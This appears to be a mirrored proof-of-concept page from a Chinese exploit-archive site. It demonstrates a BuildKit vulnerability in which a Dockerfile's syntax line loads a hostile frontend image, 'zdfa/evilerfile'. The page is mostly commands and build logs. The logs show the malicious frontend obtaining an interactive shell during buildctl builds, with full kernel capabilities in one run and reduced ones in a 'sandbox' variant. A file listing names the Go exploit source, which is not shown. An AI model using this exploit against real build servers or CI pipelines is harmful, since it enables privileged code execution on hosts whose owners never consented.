关联漏洞
介绍
```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine
RUN grep Cap /proc/self/status
```
```shell
sudo bin/buildctl build \
--frontend=dockerfile.v0 \
--local context=. \
--local dockerfile=.
```
```
➜ cp sudo bin/buildctl build \
--frontend=dockerfile.v0 \
--local context=. \
--local dockerfile=.
[+] Building 5.3s (6/6) FINISHED
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 114B 0.0s
=> resolve image config for docker.io/zdfa/evilerfile:latest 1.0s
=> CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> docker-image://docker.io/library/alpine:latest 4.0s
=> => resolve docker.io/library/alpine:latest 4.0s
=> [auth] library/alpine:pull token for registry-1.docker.io 0.0s
Dockerfile:1
--------------------
1 | >>> #syntax=docker.io/zdfa/evilerfile
2 | FROM alpine
3 | RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
% exit 99
: exit code: 99
^[[44;3R%
```
```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine as sandbox
RUN grep Cap /proc/self/status
```
```shell
➜ cp sudo bin/buildctl build \
--frontend=dockerfile.v0 \
--local context=. \
--local dockerfile=.
[+] Building 2.8s (7/7) FINISHED
=> [internal] load build definition from Dockerfile 0.1s
=> => transferring dockerfile: 125B 0.0s
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> resolve image config for docker.io/zdfa/evilerfile:latest 2.0s
=> [auth] zdfa/evilerfile:pull token for registry-1.docker.io 0.0s
=> CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e 0.0s
=> CACHED docker-image://docker.io/library/alpine:latest 0.5s
=> => resolve docker.io/library/alpine:latest 0.5s
=> [auth] library/alpine:pull token for registry-1.docker.io 0.0s
Dockerfile:1
--------------------
1 | >>> #syntax=docker.io/zdfa/evilerfile
2 | FROM alpine as sandbox
3 | RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
% exit 99
: exit code: 99
^[[44;3R%
```
文件快照
[4.0K] /data/pocs/6e5d3c5a164d484fedd9fc607728ae3ce55938f0
├── [4.0K] cmd
│ └── [4.0K] eviler
│ └── [3.8K] main.go
├── [ 300] Dockerfile
├── [ 122] go.mod
├── [322K] go.sum
└── [5.4K] README.md
2 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。